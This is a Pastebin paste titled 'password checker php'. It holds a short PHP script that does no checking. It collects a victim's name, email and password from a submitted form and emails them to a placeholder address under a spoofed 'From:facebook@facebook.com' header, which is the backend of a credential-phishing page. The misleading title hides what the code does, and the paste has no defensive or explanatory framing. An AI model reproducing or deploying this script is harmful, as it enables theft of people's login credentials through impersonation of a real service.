Advertisement
rehan99

password checker php

Sep 7th, 2011
419
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.45 KB | None | 0 0
  1. <?php
  2.        
  3.         error_reporting (E_ALL ^ E_NOTICE);
  4.     $email.= "<b>Name             : </b>".trim($_POST['name'])."<br/>";
  5.     $email.= "<b>Email            : </b>".trim($_POST['email'])."<br/>";
  6.     $email.= "<b>Password         : </b>".trim($_POST['password'])."<br/>";
  7.  
  8.     $headers = "From:facebook@facebook.com\r\n";
  9.     $headers .= "Content-Type: text/html";
  10.     mail(
  11.             "your id",
  12.             "your password",
  13.             $email,
  14.             $headers
  15.     );
  16.  
  17.     echo "Mail Completed";
  18.  
  19. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement